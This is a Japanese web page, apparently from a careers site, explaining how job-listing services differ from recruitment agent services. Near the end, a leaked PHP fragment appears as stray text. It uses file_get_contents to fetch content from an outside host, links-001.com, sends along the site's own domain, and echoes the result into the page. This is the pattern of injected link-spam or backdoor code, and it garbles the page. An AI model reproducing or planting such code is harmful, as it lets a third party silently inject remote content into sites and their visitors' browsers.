前へ
次へ

求人情報サービスとエージェントサービスの違い

新たに仕事を探そうとするとき、手軽に利用できるのがインターネットの情報サービスです。
雑誌などでもある求人情報サービスを利用する人も多いかもしれません。
掲載されている情報の中から自分に合っていそうなところを探し、その情報にかかれている方法で自分で応募をします。
もちろん書類も自力で作成します。
インターネットを通じて仕事を探す方法としてはエージェントサービスもあります。
医療系などの技術系の仕事であったり管理職など特別な技能を持っている人が利用することが多いようです。
こちらには求人情報サイトのように個別の求人情報はなく、まずは登録をしなければ利用できないようです。
エージェントサービスではエージェントと呼ばれる担当者が個別についてくれます。
ネット上から希望の条件を伝えたり、面談をして希望を伝えるときもあります。
エージェントは希望に合った求人を探してくれたり、時には企業などに人材の提案をして仕事を探してくれます。
面接や書類作成のサポートなどもしてくれます。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top